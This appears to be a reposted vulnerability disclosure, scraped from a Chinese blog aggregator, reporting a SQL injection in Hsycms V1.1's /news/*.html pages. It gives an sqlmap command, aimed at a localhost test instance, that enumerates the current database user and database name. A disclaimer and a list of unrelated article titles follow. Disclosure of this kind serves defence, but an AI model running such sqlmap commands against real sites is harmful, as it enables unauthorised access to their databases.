1. The attacker opens http://127.0.0.1/news/*.html," * " Represents any existing page.
2.Then use sqlmap to attack the page.
sqlmap.py -u http://127.0.0.1/news/151*.html --batch --current-user --current-db
An issue was discovered in Hsycms V1.1 . There is an SQL injection vulnerability via /news/*.html page
免责声明!
本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。
猜您在找
An issue was discovered in Hsycms V1.1 . There is an XSS vulnerability via /book page
XproerIM V1.1发布
拼图游戏 v1.1
DIY书籍扫描仪简介v1.1
CesiumLab V1.1 新功能 (免费Cesium处理工具集)
Wonder发布v1.1正式版本,新增资产预览、脚本、AssetBundle等
ESP32音频开发板ESP32-Korvo V1.1踩坑
PHP基础示例:商品信息管理系统v1.1
PHP基础示例:商品信息管理系统v1.1[转]
[奉献]通过命令快速启动应用程序的小软件(QuickLauncher V1.1)